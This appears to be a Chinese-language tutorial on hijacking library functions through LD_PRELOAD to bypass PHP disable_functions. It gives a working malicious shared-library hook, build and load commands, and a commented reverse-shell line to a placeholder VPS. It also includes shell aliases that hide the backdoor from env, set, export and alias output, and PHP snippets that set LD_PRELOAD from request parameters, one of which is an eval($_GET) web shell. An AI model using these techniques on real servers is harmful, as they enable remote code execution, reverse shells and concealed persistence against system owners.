用途
主要是用于绕过 disable_functions ,本质上是加载顺序的问题,
动态链接库加载过程中会先加载 LD_PRELOAD 指向的变量,这样我们可以利用这个先加载来进行劫持正常的函数和命令
只要劫持系统命令调用的一个函数就可以在劫持函数任意执行其它函数从而绕过disable_functions
劫持命令调用函数的步骤:
使用readelf -Ws查看命令使用了哪些库函数, 选取一个函数劫持,再使用strace查看函数的参数写劫持函数,
我们在这里使用命令经常用到的字符串比较函数strcmp()
同时可以看到vi
是使用了strcmp函数的
strcmp_hook.c
#include <stdlib.h>
#include <string.h>
int strcmp(const char *s1, const char *s2) {
unsetenv("LD_PRELOAD");
system("ifconfig");
return 0;
}
//值得注意的一点是我们要在劫持函数里面要使用unsetenv删除环境变量LD_PRELOAD,否则会导致下面system函数打开一个新进程执行的命令又再次使用到strcmp函数, 进入一个死循环, 而且我们写的劫持函数返回的结果是异常的, 就会导致服务器崩掉(已经试过了,,,特别是执行的命令本来就有错误的情况下)
//system("bash -c 'bash -i >& /dev/tcp/vps/port 0>&1");
gcc -shared -fPIC /test/strcmp_hook.c -o hack.so -ldl
export LD_PRELOAD=/test/hack.so
vi
echo $LD_PRELOAD
可以看到完成变量设置之后执行vi就会执行ifconfig命令
遇到个奇怪的问题:
在完成以上操作后发现执行which
命令也会运行ifconfig
命令很明显就是执行了劫持函数strcmp, 但是使用strace which
查看which命令的运行过程又看不到strcmp函数的执行记录, strace不显示strcmp的执行记录猜测可能是下面两个原因(以后知道了的话再回来填坑)
通过使用alias给命令定义别名,重新定义命令的执行,将暴露后门的内容给过滤掉再输出即可
alias echo='func(){ echo $* | sed "s!/hack.so! !g";};func'
alias env='func(){ env $* | grep -v "/hack.so";};func'
alias set='func(){ set $* | grep -v "/hack.so";};func'
alias export='func(){ export $* | grep -v "/hack.so";};func'
alias unalias='func(){ if [ # != 0 ]; then if [* != "echo" ]&&[ * != "env" ]&&[* != "set" ]&&[ * != "export" ]&&[* != "alias" ]&&[ * != "unalias" ]; then unalias*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};func'
alias alias='func(){ alias "$@" | grep -v unalias | grep -v hook.so;};func'
whoami和pwd都执行了puts()函数,但whoami会执行payload而pwd命令就不会执行payload
whoami 命令和 pwd 命令都调用了 puts 函数,使用 ltrace 进行查看的时候还都实际调用执行了,但是 pwd 不会触发 payload
设置好后门后使用 ltrace 追踪 whoami 和 pwd 命令,此时,两个都可以执行 payload
ltrace 追踪 ssh、id 等命令的时候不会触发 payload
虽然我进行函数劫持的过程中没遇到这个问题,不过也在这里记录一下吧,以后如果遇到劫持失败的情况也可以做一个可能性参考情况
里面是作者ltrace 显示pwd
有执行put函数但是运行pwd
却没有劫持成功, 但运行/bin/pwd
或/usr/bin/pwd
却成功执行代码的分析原因
这个发现过程看起来有点精彩:https://cloud.tencent.com/developer/article/1835020
总的来说就是:
执行pwd
不会执行payload
执行/bin/pwd
或/usr/bin/pwd
就会执行payload
cd pwd 这些内置命令执行的时候不会加载外部共享库,也就是不会去加载我们的 hook.so ,更不会劫持 puts 函数
其实 bash 怕像cd pwd 这种命令 /bin 目录下的二进制文件在不同系统中存在差异,所以自己集成了cd pwd 等命令
bash 内置命令一般有两个原因,一种是为了兼容性,为了不被外部程序干扰,比如 cd pwd 命令;另一种是为了执行的效率,bash内置更加高效一些
所以 cd pwd 内置命令执行的时候不会加载外部共享库,也就是不会去加载我们的 hook.so ,更不会劫持 puts 函数
我们可以通过 type -a <command>
的命令判断给出的指令是内部指令还是外部指令
可以看到我们直接使用的pwd是一个内置函数,所以就不会加载外部共享库进而触发覆盖的puts()函数,但是/bin/pwd
和/usr/bin/pwd
是外部函数可以加载外部共享库进而通过覆盖的puts()执行payload
我自己看到的
按照上面文章说法劫持失败原因是因为pwd命令默认执行的是内置命令,但是我自己使用which 查看我当前默认使用的pwd命令就是/usr/bin/pwd, 所以劫持函数正常运行
查看命令调用的库函数
readelf -Ws /usr/bin/ls
#查看ls命令调用了哪些库函数
strace /usr/bin/ls
# 更推荐用这个查找命令的调用函数明细,因为这里还可以看到函数执行的参数方便我们重写函数进行劫持(否则参数类型对不上的话不会执行我们重写的hook函数)
strace -f php function.php 2>&1 | grep -A2 -B2 execve
#查看php文件执行后调用了哪些系统命令,然后再使用readelf查看调用的系统命令使用了哪些库函数,对其进行劫持
# 可以在php文件里面只执行一个函数,然后我们就可以看到该函数执行了哪些系统命令
查看环境变量的方式:
echo LD_PRELOAD
env
set
export #值得注意的是export设置的环境变量只在当前shell有效
# 例如在xshell一个窗口设置好LD_PRELOAD变量后再打开一个窗口输出LD_PRELOAD变量显示为空
cat /proc/PID/environ
删除环境变量:
unset LD_PRELOAD
index.php
<?php
putenv("_GET[0]=_GET[1]");
echo `vi`;
payload: ?0=LD_PRELOAD&1=/test/hack.so
因为在执行bash -c "export LD_PRELOAD=ifconfig
"会执行里面的ifconfig命令然后把执行结果赋给LD_PRELOAD,所以想了能不能直接通过putenv函数执行代码,但是测试后发现实际上执行的效果是会直接带着/将原字符串原封不动赋给LD_PRELOAD,相当于执行了
export LD_PRELOAD=’\ifconfig\
‘
如果我们在系统执行export LD_PRELOAD="\ifconfig\
"可以发现\\
里面的命令还是可以被执行
<?pph
echo `env`;
eval($_GET[0]);